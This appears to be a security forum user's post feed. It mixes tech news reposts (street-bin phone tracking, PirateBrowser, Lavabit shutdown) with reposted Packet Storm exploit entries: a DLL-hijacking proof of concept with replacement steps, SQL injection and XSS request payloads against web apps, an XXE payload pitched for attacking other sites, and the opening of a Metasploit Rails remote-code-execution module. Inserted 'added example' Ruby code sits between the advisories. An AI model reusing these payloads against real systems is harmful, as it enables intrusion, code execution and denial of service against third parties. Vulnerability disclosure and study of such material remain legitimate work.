Everything posted by Matt
-
Electronic BINS in the heart of London must stop tracking hundreds of thousands of passing smartphones, officials have demanded.

A dozen or so high-tech rubbish cans - which display adverts and information on built-in flat-screens and are dotted around the capital's financial district's pavements - were set up to collect data from nearby phones.

The recycling bins, operated by Renew London, used Wi-Fi networking to identify devices using their individual MAC addresses, effectively handing over the "proximity, speed ... and manufacturer" of the gizmos. MAC addys are unique to each piece of network interface hardware out there, but they can be easily altered by software if one is in the know; the addresses also reveal the maker of the networking chipset.

The company said it used these so-called bin-based ORBs to silently detect 4,009,676 devices in one week, although that really amounts to 530,000 unique phones. Renew, which said the collected data was "anonymised" before it was analysed, hoped to use this technology to track footfall in shopping areas and perhaps even show tailored adverts to people as they walked by the bins.

But the first pilot testing the Orb system has now been cancelled after The City of London Corporation, which oversees the centre of the Big Smoke, pulled the plug. The authority only found out about the trial when journalists got hold of the study, a source told The Register. A report has also been made to Blighty's privacy watchdog, the Information Commissioner.

A spokesman for the corporation said: "We have already asked the firm concerned to stop this data collection immediately and we have also taken the issue to the Information Commissioner's Office. Irrespective of what's technically possible, anything that happens like this on the streets needs to be done carefully, with the backing of an informed public.

"This latest development was precipitate and clearly needs much more thought. In the meantime data collection – even if it is anonymised - needs to stop."

(Don't forget that modern smartphone makers already track your movements by default: both Apple and Google already track people through their location services features, although these can be disabled. Unlike the tracking in the bins.)

In a statement, Renew boss Kaveh Memari claimed the reaction to his firm's technology was blown out of proportion. He said: "I'm afraid that in the interest of a good headline and story there has been an emphasis on style over substance that makes our technology trial slightly more interesting than it is.

"During our initial trials, which we are no longer conducting, a limited number of pods had been testing and collecting anonymised and aggregated MAC addresses from the street and sending one report every three minutes concerning total footfall data from the sites. A lot of what had been extrapolated is capabilities that could be developed and none of which are workable right now." ®

Source TheRegister.co.uk
-
The Pirate Bay's new censorship-dodging browser 'not secure'
Matt posted a topic in Stiri securitate
The Pirate Bay has released a bundle of add-ons to help people search for and access bits of the internet that governments and ISPs have locked away. The only hitch is: despite the fact that it contains a Tor client, security experts have said that it doesn't completely anonymise internet traffic. This has raised concerns about users' security.

PirateBrowser, released in celebration of the torrent site's 10th birthday – and with a bunch of torrent sites already bookmarked, natch – is based on Firefox Portable and comes bundled with proxy-management toolset Foxyproxy and the Tor client Vidalia.

In its FAQ, The Pirate Bay says:

Security experts have complained that The Pirate Bay failed to adhere to Tor security protocols, with one observer claiming the new browser was "unsafe".

The new browser was released on Saturday, the notorious file-sharing site's 10th anniversary. The Pirate Bay said: "Do you know any people who can't access TPB or other torrent sites because they are blocked? Recommend PirateBrowser to them. It's a simple one-click browser that circumvents censorship and blockades and makes the site instantly available and accessible."

It added: "This browser is intended just to circumvent censorship — to remove limits on accessing websites your government doesn't want you to know about."

But Twitter has erupted in criticism. The Spy Blog, which focuses on security, privacy and surveillance issues, tweeted:

#PirateBay #ThePirateBay don't touch #PirateBrowser ! Crippled Tor Browser Bundle: no Tor Button, no NoScript, no package Digital Signature
— Spy Blog (@spyblog) August 11, 2013

Jacob Appelbaum, a security bod and a spokesman for the Tor Project, also tweeted:

Piratebrowser seems like they didn't read the Tor Browser Design documents. It seems unsafe.
— Jacob Appelbaum (@ioerror) August 11, 2013

In an FAQ about the browser, The Pirate Bay reassured torrent-seekers that there were no hidden nasties in their software. It said: "There have been no modifications to any of the packages used, no adware, Trojans, toolbars, etc. This is simply a tool to help people get around censorship."

The creators of PirateBrowser lumped the UK and other countries that have issued court orders blocking access to torrent search sites together with international badboys like Iran and North Korea, claiming that nations around the world want to "limit" their citizens' online access. TPB described the PirateBrowser thus:

The Pirate Bay has come under attack in recent months, with founder Gottfrid Svartholm Warg sentenced to two years' imprisonment in Sweden after being found guilty of hacking. ®

* Sites expressing anti-government views or which include "undesirable content", such as YouTube, are routinely blocked in Iran. VPN services and certain social networking websites are also blocked.

Source TheRegister.co.uk
-
You wrote in white and nothing is visible, except .
-
Trend Micro collaborates with INTERPOL in the fight against cybercrime worldwide

Trend Micro, a global leader in the security software industry, recently announced a collaboration protocol with INTERPOL through which it offers its support in activities to fight cybercrime.

In recent years, well-organised criminal networks operating on a large scale have made cyber threats more sophisticated and much faster, reaching their target in no more than a few minutes. Because of the growing complexity of this criminal environment, cyber investigations are also much more complex, requiring a very high level of technical expertise and investigative actions that involve connections across multiple jurisdictions. It is essential that law-enforcement institutions prioritise their resources and build collaborative relationships across jurisdictions and sectors in order to develop the technical skills, tools and infrastructure they need to combat cyber threats effectively and to improve digital security in general.

To this end, INTERPOL is laying the foundations of the INTERPOL Global Complex for Innovation (IGCI), to be created in Singapore in 2014, which will function as a centre of excellence for international cooperation against organised cybercrime. The centre will seek to build an alliance with multiple bodies specialised in IT security, as well as Internet security specialists from the private sector, to use their expertise for the benefit of all institutions fighting cybercrime.

Trend Micro will support INTERPOL through its IT security experts with the aim of eradicating cybercriminal networks. Last month, Eva Chen, CEO of Trend Micro, met in Lyon with Ronald K. Noble, Secretary General of INTERPOL, to discuss details of this collaboration. Trend Micro will provide training programmes to INTERPOL staff, to government organisations and police services in the countries participating in this centre, and to large companies that manage core infrastructure. The training programmes will include eLearning modules for online study, in-person classroom sessions, workshops and professional certification sessions, based on specific learning objectives. The collaboration with INTERPOL will allow Trend Micro to take another step towards fulfilling its vision of contributing to a safer world for the exchange of data.

"Romania has been among INTERPOL's member countries since 1923 and is also part of ENISA (the European Network and Information Security Agency in the EU). Thus, a collaboration with INTERPOL within this centre would be very likely, given how effectively the Romanian authorities have been involved in actions to combat cybercrime in recent years," explains Alexandru Molodoi, CTO of GECAD NET, the sole distributor of Trend Micro security solutions in Romania.

More details about Trend Micro products can be found here: Trend Micro | Antivirus | Antispam | GECAD SHOP

Source FaraVirusi.Com
-
Facebook's Sheryl Sandberg, who is second in command at the free content ad network, sold a big chunk of shares in the company just days after stocks finally hit a higher value than they were assigned at the firm's initial public offering (IPO). US regulatory filings released late last week show that Sandberg offloaded a further 2.37 million shares at an average price of $38 – altogether worth around £91m to the ex-Google exec and author of Lean In: Women, Work, and the Will to Lead. As we noted last month, Facebook boss Mark Zuckerberg has retained his shares. Of course, he said at the time – just after the company's gigantic belly-flop on the New York Stock Exchange in May last year – that he wouldn't be selling any stock for personal gains until September 2013 at the earliest. Sandberg, on the other hand, has regularly shifted her stock under automated trading plans. Significantly, her shares sale – dated 9 August on the filing – is the biggest one made by any of the high flyers at Facebook since it punched through its IPO price 10 days earlier, on 30 July this year. In November 2012, Zuck's right-hand woman banked approximately $7.44m after she sold around 353,000 of her shares in Facebook as trading restrictions for employees expired. But her latest sale completely eclipses that figure. Despite letting go of around five per cent of the stock, Sandberg still holds more than $1bn in Facebook shares. Shares in Facebook were slightly up on Nasdaq at $38.56 in after-hour trading on Friday. It took Facebook more than a year to slide past its IPO share price only after the company last month satisfied Wall Street with impressive record earnings off the back of strong mobile growth. ® Source TheRegister.co.uk
-
Windows Phone owners must wait until next spring for a major platform update, latest reports appear to confirm.

The platform has shown strong growth in 2013, almost entirely thanks to a concerted campaign by Nokia and almost entirely at the expense of BlackBerry. But the upsurge in momentum hasn't obliged Microsoft to break a sweat: there are unlikely to be any surprises prior to Windows Phone 8.1 – codenamed by Windows as the "Blue" Phone update – which has been pegged for release in spring 2014.

But one more "service pack" (Redmond brands these as General Distribution Releases, or GDRs) is expected before then, The Verge reports. GDR3 will give platform support to 1080-pixel screens, an orientation lock and … a Driver Mode. They won't be handing out beta blockers to dampen the WinPhonbois with this one.

The current "service pack", GDR2, is currently being rolled out. Among other things, it included HTML5 improvements, a stability upgrade to Skype and FM radio. The updates generally hit new Windows Phones first before being introduced on the older phones.

Big changes... but they're all backstage

Microsoft did a remarkable job of switching platforms last year without anybody really noticing: it moved the Windows Phone OS to a new kernel, new app framework and a new API - abandoning the legacy Embedded CE kernel, and deprecating the Compact .NET framework (program-execution environment for apps) and Silverlight upon which Windows Phone 7.x was based. Impressively, it also did so without any compatibility glitches and by hitting demanding system requirements, making for a pretty lean package. The volume growth this year owes much to the Windows Phone 8's ability to perform well in 512MB on a 1GHz processor - something BlackBerry can't manage with BB10 and which has so far eluded Landfill Android and trade devices also.

But these are behind-the-scenes improvements. Other than a "Kid's Corner" and resizable tiles, hardly anything has changed out in userland. In fact, 2011's Mango update – aka WinPhone 7.5 - provided the last significant major userland change, and arguably the only major noticeable overhaul since Windows Phone's launch in late 2010. And it's not as if it's perfect. Users are impatient for modern notifications - promised in 8.0 but held over for lack of time - and the system still lacks the on-device search function that all rivals now offer.

Yet for all its relative success, the Windows Phone team must march to a corporate step. The chaotic legacy of Steve Sinofsky's tenure left Microsoft building "modern" apps on three incompatible UIs: Win 8 desktop, RT and Windows Phone. This year Microsoft also undertook its biggest ever re-organisation, with leading lights including WinPhone boss Terry Myerson moving out of the team. Some sources familiar with the team suggest this might actually speed up development - "Myerson's very much about preserving the purity of his platform," one potential ODM told us this year. ®

Source TheRegister.co.uk
-
Analysis The sudden closure of two secure email services may cause many privacy-conscious people to begin looking for alternatives. However, security experts warn that any service provider may be put under pressure to comply with authorities, and this might kill off secure mail as we know it.

Lavabit's Levison: No more palaver, I'm lathered over {redacted}

The issue has become even more of a hot topic among infosec professionals since Texas-based Lavabit – reportedly NSA whistleblower Edward Snowden's preferred email provider – announced it was going to roll down the shutter on services on Thursday.

Ladar Levison, the owner of Lavabit, said the firm had "decided to suspend operations" in the face of US legal pressure over recent weeks as an unpalatable but better alternative to becoming "complicit in crimes against the American people". Levison is careful not to say this directly, but the implication is that he was either served with a court order from the Foreign Intelligence Surveillance Court or a National Security Letter. Both legal documents come with compulsory gag orders. (You can see an interview with Nicholas Merrill, one of the few people to win the right to talk about a National Security Letter he was served with, here.)

Man-in-the-middle attack likely only way to get around encryption

Lavabit encrypts stored messages using public key cryptography as well as encrypting the contents of email in transit to guard against eavesdropping. This means that without a customer's private key nobody - not even Levison – can unscramble messages. This is a marked difference from bigger webmail providers such as Google's Gmail or Microsoft's Outlook.com, which hold the keys that would allow them to unscramble messages and turn them over to the authorities, if compelled.

Email stored on Lavabit's servers was encrypted using asymmetric elliptical curve cryptography, as explained in documents about its architecture. This service was only available to holders of premium accounts (among them, reportedly, Edward Snowden, who was said to have maintained the somewhat prosaic address edsnowden@lavabit.com).

The Feds might be seeking to intercept communications in transit between Lavabit and its customers using some form of man-in-the-middle attack or even seeking to plant government-sanctioned malware, El Reg's security desk speculates. If Snowden was the intended target then all sorts of exotic zero-day exploits might have been brought into play. This is all complete guesswork on our part and all we know for sure is that Lavabit shut itself down to avoid complying with something it found intolerable while it takes its case to the Fourth Circuit Court of Appeals.

The owner of the boutique email service provider said he hoped to relaunch Lavabit in the US providing its pending appeals court case goes its way. It has begun soliciting donations for a legal defence fund. Levison said the whole experience had taught him a "very important lesson: without congressional action or a strong judicial precedent, I would _strongly_ recommend against anyone trusting their private data to a company with physical ties to the United States," he said.

PGP daddy shuts down new secure email service

Hours later PGP daddy Phil Zimmermann's Silent Circle said it was shutting down its recently inaugurated email service rather than having to face the possibility of receiving a secret court order in future. The firm is continuing with its core business of supplying secure messaging and encrypted voice apps for smartphones. But Silent Circle said it had unplugged and wiped its email service even in absence of any search or seizure order from government.

"We see the writing on the wall, and we have decided that it is best for us to shut down Silent Mail now," Jon Callas, Silent Circle's CTO, explains in a blog post. "We have not received subpoenas, warrants, security letters, or anything else by any government, and this is why we are acting now."

Silent Circle runs its servers in Canada and has plans to expand to Switzerland. For the time being, though, it only has offices in the US and UK. However, despite having a presence outside the US, the owners still decided they wouldn't be able to continue Silent Mail in good conscience.

Any UK firm offering similar services to Lavabit and Silent Circle would have to comply with RIPA and any other future local law, such as the Snoopers' Charter, if it is ever reanimated. And any service provider in the EU would be obliged to adhere to the Data Retention Directive, which specifies (among other things) that each [member state's] authority shall in particular be endowed with investigative powers, such as powers of access to data forming the subject-matter of processing operations and powers to collect all the information necessary for the performance of its supervisory duties. Setting up a secure ISP in an EU state means living with a regime little more friendly than that which exists in the US.

"All EU member states have to comply with the Data Retention Directive," Brian Honan, of BH Consulting and founder of Ireland's CSIRT told El Reg. "Each EU member state will implement the directive differently and will also have their own local laws too."

Honan said the only secure alternative is a DIY approach using encryption tools such as PGP. And even that approach won't always work – either due to a failure to use the technology properly or malware infection. "Use PGP on the desktop as only you have access to your private key. For extra protection keep private key separate from PC," Honan told El Reg.

Source TheRegister.co.uk
-
The hacking team behind the notorious attack on The New York Times has targeted an unnamed economic policy agency with new hyper-sophisticated malware, according to FireEye researchers.

FireEye reported unearthing the new hack tools when analysing a recent attack on one of the company's clients, warning that the malware is significantly more advanced than those used in the group's previous campaigns.

"The attackers behind an audacious breach of The New York Times' computer network late last year appear to be mounting fresh assaults that leverage new and improved versions of malware. The new campaigns mark the first significant stirrings from the group since it went silent in January in the wake of a detailed expose of the group and its exploits," wrote the researchers.

News of The New York Times attack broke in January, when the publication reported being the victim of an ongoing cyber campaign. Security firm Mandiant, which helped mitigate the attack, subsequently reported linking the campaign to a Chinese group. The attacks are believed to have been carried out in retaliation to a series of articles about former Chinese prime minister Wen Jiabao.

FireEye senior malware researcher Ned Moran told V3 the new attacks use evolved versions of the longstanding Aumlib and Ixeshe malwares, which have been used by criminals in targeted attacks for several years. He added that the upgraded tools are designed to help the criminals avoid detection, even from advanced systems designed to detect their previous tools, when hacking into their victim's network.

"The network protocol has been altered. Signatures designed to detect the previous version of these tools may not detect these new network protocols. This may enable the threat actor to operate undetected," said Moran.

The report said, while troubling, the development is not surprising and is typical of most hackers; the group that hacked The New York Times is simply amending its strategy having been discovered. "Attackers do not change their approach unless an external force or environmental shift compels them to. As the old saying goes: if it ain't broke, don't fix it," read the report.

The attack is one of many advanced threats uncovered this year. Arbor Networks last week reported uncovering a new bruteforce botnet campaign, which has already infected over 25,000 Windows machines with malware using an unknown infection method.

Source V3.co.uk
-
US president Barack Obama held a meeting last week with Apple CEO Tim Cook, Google computer scientist Vint Cerf and Randall Stephenson, the CEO of US telecoms giant AT&T, it has emerged. According to Politico, the meeting discussed the NSA and other privacy issues including tracking consumers online. This followed a gathering earlier last week attended by the bodies representing companies including Facebook, Microsoft, Google and Yahoo: TechAmerica, the Information Technology Industry Council and TechNet. A White House official told Politico that the talks were a part of the president's ongoing efforts to work out how to best handle the storm surrounding June's PRISM revelations. "This is one of a number of discussions the administration is having with experts and stakeholders in response to the president's directive to have a national dialogue about how to best protect privacy in a digital era, including how to respect privacy while defending our national security," the source said. The meetings follow an open letter to the president in June, seeking to increase the transparency of government data requests in an effort to limit the PR damage caused by the mysterious and unexplained handing over of data. The signatories included Apple, Facebook, Microsoft, Twitter and Yahoo, as well as 17 other tech corporations. "Just as the United States has long been an innovator when it comes to the internet and products and services that rely upon the internet, so too should it be an innovator when it comes to creating mechanisms to ensure that government is transparent, accountable, and respectful of civil liberties and human rights," the letter said. Last week, in a bid to curb further alleged privacy violations, firms Lavabit and Silent Circle both discontinued their secure email services following government interference. Lavabit specifically had been linked to NSA whistleblower Edward Snowden, who revealed the extent of PRISM in June. Source V3.CO.UK
-
https://www.dropbox.com/s/vvs1tiny87j6900/124317598-James-Fenimore-Cooper-Ultimul-Mohican.pdf
-
NSA to world: we're only watching 1.6% of internet ! HAHAHAHAHAHA
Matt replied to Matt's topic in Stiri securitate
Don't worry, that 1.6% thing is nonsense. "Echelon" is surely doing its job -
Description Bricks is a web application security learning platform built on PHP and MySQL. The project focuses on variations of commonly seen application security issues. Each 'Brick' has some sort of security issue which can be leveraged manually or using automated software tools. The mission is to 'Break the Bricks' and thus learn the various aspects of web application security. Bricks is a completely free and open source project brought to you by OWASP. Changes : This is the seventh public release of Bricks. A new challenge can be found on the login pages section. Download : HERE
-
Description : HTCSyncManagerUpdate suffers from a DLL hijacking vulnerability. Author : Iranian_Dark_Coders_Team Source : HTCSyncManagerUpdate DLL Hijacking ? Packet Storm Code :

Exploit Title: HTCSyncManagerUpdate (quserex.dll & mfc71enu.dll & mfc71loc.dll ) Path Subversion Arbitrary DLL Injection Code Execution
Author: Iranian_Dark_Coders_Team
Discovered by A.CH12
Software Link: http://www.htc.com/
Version: 2.1.46.0
Tested on: Windows 7

// :::'###::::::::::::::::'######::'##::::'##::::'##::::'#######::
// ::'## ##::::::::::::::'##... ##: ##:::: ##::'####:::'##.... ##:
// :'##:. ##::::::::::::: ##:::..:: ##:::: ##::.. ##:::..::::: ##:
// '##:::. ##:::::::::::: ##::::::: #########:::: ##::::'#######::
// #########:::::::::::: ##::::::: ##.... ##:::: ##:::'##::::::::
// ##.... ##::::'###:::: ##::: ##: ##:::: ##:::: ##::: ##::::::::
// ##:::: ##:::: ###::::. ######:: ##:::: ##::'######: #########:
// ..:::::..:::::...::::::......:::..:::::..:::......::.........::

=============================================================
#include <windows.h>
#include <stdlib.h>   /* added: declares system() and exit() */

#define DllExport __declspec (dllexport)

int egg(void);        /* added: forward declaration so egg() is known before it is called */

DllExport void DwmSetWindowAttribute()
{
    egg();
}

int egg()
{
    system ("calc");
    exit(0);
    return 0;
}
=============================================================

Instructions:
1. Compile dll
2. Replace quserex.dll or mfc71enu.dll or mfc71loc.dll in HTC Sync Manager directory with your newly compiled dll
3. Launch HTCSyncManagerUpdate
4. Bo0o0o0o0o0o0o0m !

Greet to my Lovely friends : nimaarek , D.S (ASA);
-
Description : vbBux / vbPlaza version 4.0.3 suffers from a remote SQL injection vulnerability. Author : n3tw0rk Source : vbBux / vbPlaza 4.0.3 SQL Injection ? Packet Storm Code :

# Exploit Title: vbBux and vbPlaza v4 SQLI                                 #
# Author(s): n3tw0rk (twiiter.com/n3tw0rkgod)                              #
# Contact: Mail:infectedelite@gmail.com                                    #
# Product: 4.0.3 and below                                                 #
# Software Version x.x.x                                                   #
# Product Download: http://www.vbulletin.org/forum/showthread.php?t=270271 #
# Homepage: d4tabase.com                                                   #
# _____________________________________________________________            #

The exploit is caused due to a variable named 'vbplaza_lottery_history' not being sanitized before being used within an insert into statement.

POC

You will need Admincp Access then go to http://localhost/admincp/vbplaza_lottery.php?do=searchhistory then in the force read order column put a ' into the search bar and result should show

Database error in vBulletin 4.2.1:

Invalid SQL:

Database error in vBulletin 4.2.1

Invalid SQL:
SELECT COUNT(*) AS count
FROM vbplaza_lottery_history
WHERE 1=1 AND (lotteryid = ');

MySQL Error   : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 3
Error Number  : 1064
Request Date  : Sunday, August 11th 2013 @ 05:17:53 PM
Error Date    : Sunday, August 11th 2013 @ 05:17:54 PM
Script        : http://localhost/admincp/vbplaza_lottery.php?do=findhistory
Referrer      : http://localhost/admincp/vbplaza_lottery.php?do=searchhistory
IP Address    : ::1
Username      : n3tw0rk
Classname     : vB_Database
MySQL Version : 5.5.27
-
Description : Gnew 2013.1 suffers from cross site scripting and remote SQL injection vulnerabilities.
Author : LiquidWorm
Source : Gnew 2013.1 Cross Site Scripting / SQL Injection (Packet Storm)
Code :

Gnew v2013.1 Multiple XSS And SQL Injection Vulnerabilities

Vendor: Raoul Proença
Product web page: http://www.gnew.fr
Affected version: 2013.1

Summary: Gnew is a simple Content Management System written with PHP language and
using a database server (MySQL, PostgreSQL or SQLite) for storage.

Desc: Input passed via several parameters is not properly sanitised before being
returned to the user or used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code and HTML/script code in a user's
browser session in context of an affected site.

=========================================================================================
| PARAM         | TYPE      | FILE                                                      |
=========================================================================================
| gnew_template | XSS       | /users/profile.php, /articles/index.php, /admin/polls.php |
|---------------------------------------------------------------------------------------|
| category_id   | XSS       | /news/submit.php                                          |
|---------------------------------------------------------------------------------------|
| news_id       | XSS, SQLi | /news/send.php, /comments/add.php                         |
|---------------------------------------------------------------------------------------|
| post_subject  | XSS       | /posts/edit.php                                           |
|---------------------------------------------------------------------------------------|
| thread_id     | XSS, SQLi | /posts/edit.php                                           |
|---------------------------------------------------------------------------------------|
| user_email    | SQLi      | /users/register.php, /users/password.php                  |
=========================================================================================

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.7
           MySQL 5.5.25a

Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2013-5153
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5153.php

23.07.2013

---

#1 [xss]

GET /gnew/users/profile.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/gnew/admin/index.php
Cookie: PHPSESSID=8nta354i78d5att3l2gkh9g573; gnew_date_format=D%2C+M+jS+Y%2C+g%3Ai+a; gnew_date_offset=0; gnew_language=english; gnew_template=clean"><script>alert(1)</script>
Connection: keep-alive

#2 [xss]

POST /gnew/news/submit.php HTTP/1.1
Content-Length: 112
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:80/gnew/
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate

category_id=1"><script>alert(2);</script>&news_source=1&news_subject=1&news_text=1&preview=Preview&submit=Submit

#3 [xss]

POST /gnew/news/send.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:80/gnew/
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate

friend_email=lab@zeroscience.mk&html_email=1&news_id=572"><script>alert(3);</script>&send=Send&user_email=root@att.com&user_name=admin

#4 [xss]

POST /gnew/comments/add.php HTTP/1.1
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:80/gnew/
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate

add=Add&comment_subject=1&comment_text=1&news_id=574"><script>alert(4);</script>&preview=Preview

#5 [sqli]

POST /gnew/news/send.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:80/gnew/
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate

friend_email=lab@zeroscience.mk&html_email=1&news_id=572{SQL Injection}&send=Send&user_email=root@att.com&user_name=admin

#6 [xss]

POST /gnew/posts/edit.php HTTP/1.1
Content-Length: 153
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:80/gnew/
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate

category_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=zsl"><script>alert(5);</script>&post_text=test&preview_edited=Preview&thread_id=6

#7 [xss]

POST /gnew/posts/edit.php HTTP/1.1
Content-Length: 184
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:80/gnew/
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate

category_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=test&post_text=test&preview_edited=Preview&thread_id=6"><script>alert(6);</script>

#8 [sqli]

POST /gnew/posts/edit.php HTTP/1.1
Host: localhost
Content-Length: 127
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost:80/gnew/
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate

category_id=1&edit=Edit&post_creation=1374594465&post_id=6&post_subject=test&post_text=test&preview_edited=Preview&thread_id=6{SQL Injection}

#9 [sqli]

POST /gnew/users/password.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/gnew/users/password.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

user_name=test&user_email={SQL Injection}&password=Send

#10 [sqli]

POST /gnew/users/register.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/gnew/users/password.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

user_name=test&user_email={SQL Injection}&password=Send
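Added example, not part of the advisory above and not Gnew code: the check a tester runs on the response to requests like #1 to #7 before accepting a reflected-XSS finding. The same canary the advisory injects is searched for in the response body, and the result distinguishes a verbatim reflection (exploitable) from an HTML-encoded one (the application escaped the output, so the parameter is not an XSS sink). The three response bodies are constructed for the example, not captured from a Gnew install.

```ruby
# Added example (not Gnew code, not from the ZSL advisory): classify how an
# injected XSS canary came back in an HTTP response body.
require 'cgi'

# Canary in the advisory's style, e.g. news_id=572"><script>alert(3);</script>
MARKER = '"><script>alert(3);</script>'.freeze

# :unescaped -> marker is present verbatim, the page breaks out of the attribute
#               and the script tag is live (confirms the advisory's finding)
# :escaped   -> marker is present only as &quot;&gt;&lt;script&gt;... (output
#               encoding is in place; not exploitable as XSS)
# :absent    -> the parameter is not reflected in this page at all
def reflection_status(body, marker = MARKER)
  return :unescaped if body.include?(marker)
  return :escaped if body.include?(CGI.escapeHTML(marker))
  :absent
end

# Constructed sample responses for the three cases (not real Gnew output).
VULNERABLE_RESPONSE = %(<input type="hidden" name="news_id" value="572"><script>alert(3);</script>">)
SAFE_RESPONSE       = %(<input type="hidden" name="news_id" value="572&quot;&gt;&lt;script&gt;alert(3);&lt;/script&gt;">)
NO_REFLECTION       = %(<p>Article not found</p>)

if __FILE__ == $0
  { vulnerable: VULNERABLE_RESPONSE, safe: SAFE_RESPONSE, none: NO_REFLECTION }.each do |name, body|
    puts "#{name}: #{reflection_status(body)}"
  end
end
```

The order of the two checks matters: a page that reflects the canary both raw and encoded (for example once in an attribute and once in an error message) is still exploitable, so the verbatim match is tested first.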
-
Description : This is a supplement to the SA-20130719-0 SEC Consult advisory that notes an additional attack vector for an XXE injection vulnerability in Sybase EAServer.
Author : MustLive
Source : Sybase EAServer XXE Injection (Packet Storm)
Code :

Hello!

I'll give you additional information concerning the advisory SEC Consult SA-20130719-0 :: Multiple vulnerabilities in Sybase EAServer (http://securityvulns.ru/docs29622.html). It's about XXE Injection in Sybase EAServer.

Among the vulnerabilities in EAServer there is an XXE Injection, and only the local file inclusion and directory listing attack vector was mentioned. But this XXE Injection vulnerability also allows attacks on other sites to be conducted. So I'll supplement SEC Consult's advisory and bring your attention to another attack vector.

I wrote about such attacks in my 2012 article "Using XML External Entities (XXE) for attacks on other sites" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2012-August/008481.html) and my 2013 article "Using XXE vulnerabilities for attacks on other sites" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-August/008887.html). As I described in my articles, XXE vulnerabilities can be used for conducting CSRF and DoS attacks on other sites (and when using multiple web sites it's possible to conduct DDoS attacks). And last month I released a tool for conducting such attacks: in DAVOSET v.1.1.2 I added support for XML requests for XXE vulnerabilities.

XXE (WASC-43):

For the attack it's needed to send the following XML data in a POST request.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://site/page">]>
<lol>
<dt>
<stringValue>&xxe;</stringValue>
<booleanValue>0</booleanValue>
</dt>
</lol>

So all servers with affected versions of Sybase EAServer can be used for attacks on other sites via XXE.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
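Added example, not part of MustLive's post, of SEC Consult's advisory or of EAServer: a builder for the request body shown above with the external entity pointed at a chosen URL, plus the pre-parse guard a server-side XML endpoint can apply to refuse such a document. The element names (lol, dt, stringValue, booleanValue) are the ones in the post; the guard's policy of rejecting any DOCTYPE is an assumption made for the example, not something the post describes.

```ruby
# Added example (not from the post, the advisory or EAServer).

# The POST body from the post, with the SYSTEM entity aimed at target_url.
# A parser that resolves external entities expands &xxe; inside <stringValue>
# by fetching target_url from the EAServer host itself, which is the
# CSRF/DoS-against-third-parties vector the post describes.
# Assumes target_url contains no double quote.
def xxe_request_body(target_url)
  <<~XML
    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "#{target_url}">]>
    <lol>
    <dt>
    <stringValue>&xxe;</stringValue>
    <booleanValue>0</booleanValue>
    </dt>
    </lol>
  XML
end

# Guard applied before the document reaches any XML parser: entities can only
# be declared in a DTD (inline in the DOCTYPE's internal subset, or in an
# external DTD the DOCTYPE references), so refusing every DOCTYPE closes both
# routes whatever the parser behind the endpoint does with external entities.
# The match is case-insensitive because XML keywords are matched literally by
# parsers but a reviewer may not notice an odd-cased one. Documents that carry
# the keyword only inside a comment or CDATA are rejected too; that is the
# fail-closed trade-off of a pre-parse check.
def safe_xml?(document)
  !document.match?(/<!DOCTYPE/i) && !document.match?(/<!ENTITY/i)
end

if __FILE__ == $0
  body = xxe_request_body('http://site/page')
  puts body
  puts "attack body accepted? #{safe_xml?(body)}"
  puts "plain request accepted? #{safe_xml?('<lol><dt><stringValue>x</stringValue></dt></lol>')}"
end
```

Where the service must accept documents with a DOCTYPE, the alternative is to configure the parser to not resolve external entities and external DTDs; the pre-parse guard is the option that does not depend on knowing which parser and which settings EAServer uses internally.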
-
Description : This Metasploit module implements remote command execution on Ruby on Rails applications. Prerequisite is knowledge of the "secret_token" (Rails 2/3) or "secret_key_base" (Rails 4). The values for those can be usually found in the file "RAILS_ROOT/config/initializers/secret_token.rb". The module achieves RCE by deserialization of a crafted Ruby Object.
Author : joernchen
Source : Ruby on Rails Known Secret Session Cookie Remote Code Execution (Packet Storm)
Code :

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  #Helper Classes copy/paste from Rails4
  class MessageVerifier
    class InvalidSignature < StandardError; end

    def initialize(secret, options = {})
      @secret = secret
